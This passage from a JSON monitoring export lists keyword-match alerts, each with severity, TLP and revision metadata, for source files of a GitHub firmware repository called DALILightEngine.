"admiraltyCode": 
"A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "f840db446914b74742a2edc06997a14754b6701b", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/Application/DbgAscCommandHandler/DbgAscCommandHandler.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/Application/DbgAscCommandHandler/DbgAscCommandHandler.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "d8aa39502e78cf1b7fc693ddc2a8d87584de591d", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/Application/DbgAscCommandHandler/DbgAscCommandHandler.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/Application/DbgAscCommandHandler/DbgAscCommandHandler.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:37+00:00", + 
"evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "5ff597aa0bcf83af6a0065a87369db0d35a0aa9c", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/Application/StatusManager/StatusManager.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/Application/StatusManager/StatusManager.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "0ae60813662b989e7be38ed11ad3b678d849a4f2", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/Application/StatusManager/StatusManager.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/Application/StatusManager/StatusManager.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:37+00:00", + "evaluation": { + 
"admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "4a88bc25d04b611667615d9585c83f352c11a08b", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/Drivers/EepromHandler/EepromHandler.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/Drivers/EepromHandler/EepromHandler.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "46263a0e8543c3175e88cfb952feef77958e53dc", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/Drivers/EepromHandler/EepromHandler.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/Drivers/EepromHandler/EepromHandler.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, 
+ "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "bfb9458a904b3ea4678e5b4bab830cf7465b268f", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/Drivers/ManchesterCodec/ManchesterCodec.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/Drivers/ManchesterCodec/ManchesterCodec.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "f28470e0347408c6d0685216469977d28e53424c", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/Drivers/ManchesterCodec/ManchesterCodec.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/Drivers/ManchesterCodec/ManchesterCodec.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + 
"severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "c5135779e4588be9194eb3071df4995dbedf33c1", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/Drivers/ManchesterCodec/ManchesterCodec_def.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/Drivers/ManchesterCodec/ManchesterCodec_def.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "c44d8ea280f030c7362c70017508cb85ccc06493", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/DriversConfig/EepromHandler/EepromHandler_prm.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/DriversConfig/EepromHandler/EepromHandler_prm.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + 
"severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "975e59dd47c018657eb4485ab657ead8b26aa7ca", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/DriversConfig/ManchesterCodec/ManchesterCodec_cfg.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/DriversConfig/ManchesterCodec/ManchesterCodec_cfg.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "3e94a9678391f553e474fa9b0eccb23cb90e8119", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/DriversConfig/ManchesterCodec/ManchesterCodec_cfg.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/DriversConfig/ManchesterCodec/ManchesterCodec_cfg.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + 
"reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "9e6bf52a33c7a082acf383899af13d8f5ccef8ff", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/DriversConfig/ManchesterCodec/ManchesterCodec_prm.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/DriversConfig/ManchesterCodec/ManchesterCodec_prm.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "4c17b93006a28fbdd11c08f6414917f3ba6cd239", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/Clock/Clock.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/Clock/Clock.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": 
"amber", + "ttl": 30 + }, + "id": "03201ac767aec006a655436c3eafb23851ffd278", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/Clock/Clock.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/Clock/Clock.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "87be0468bcd0e9cd0d64fa437d9c81568d12e1f8", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/Clock/Clock_def.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/Clock/Clock_def.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "9b85a966fad22a4381a23c5969a32f7bee3b3d87", + "matchesType": [ + "keyword" + ], + 
"matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/DAC/Dac.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/DAC/Dac.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "1e32591e9ce43d29533952ee0ed4e6d86e7229cd", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/DAC/Dac.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/DAC/Dac.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "f2ed48312c0ac906ef9bb88b709ba744a15dd534", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/DAC/Dac_def.h", + "revisions": [ + { + "bind": [ + { + "bindBy": 
"cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/DAC/Dac_def.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "2594cfc267fb69cba8616f8495ed5cb9fca33a8b", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/Event/Event.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/Event/Event.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "2ec1a197969971fc073fe834a03844dac415ff60", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/Event/Event.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + 
"data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/Event/Event.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "1a20c1e212e4e2020e86bc2979ead2969b57be26", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/Event/Event_def.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/Event/Event_def.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "89b65948485f8d1f576bef18f5a158eee70d45f1", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/GPIO/Gpio.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", 
+ "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/GPIO/Gpio.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "03563a4a63afa79c73f4d3c0eb90410b7135a5cb", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/GPIO/Gpio.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/GPIO/Gpio.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "b942402e4a72a5ed96bc1c247886bf3431142f88", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/GPIO/Gpio_def.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + 
"url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/GPIO/Gpio_def.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "ff1a9f0c737f8350268dd076797c54ab767f4f94", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/I2C/I2c.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/I2C/I2c.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "db3aecb29f911dd5f594b2ab5f65b564905028a7", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/I2C/I2c.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/I2C/I2c.h" + }, + { + "dataFound": [], + "dateCreated": 
"2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "21df44f8a39983be5e00aa47044a9f5474f0e775", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/I2C/I2c_def.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/I2C/I2c_def.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "550cd0d1903f330f985d7793d857657c20ce3663", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/Interrupt/Interrupt.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/Interrupt/Interrupt.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + 
"admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "634285cb5efe4560e7e888d3d227839339fb43b3", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/Interrupt/Interrupt.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/Interrupt/Interrupt.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "b4d7646beb83eccb0fc54e3d0c6724bc2eea548b", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/PowerManager/PowerManager.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/PowerManager/PowerManager.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": 
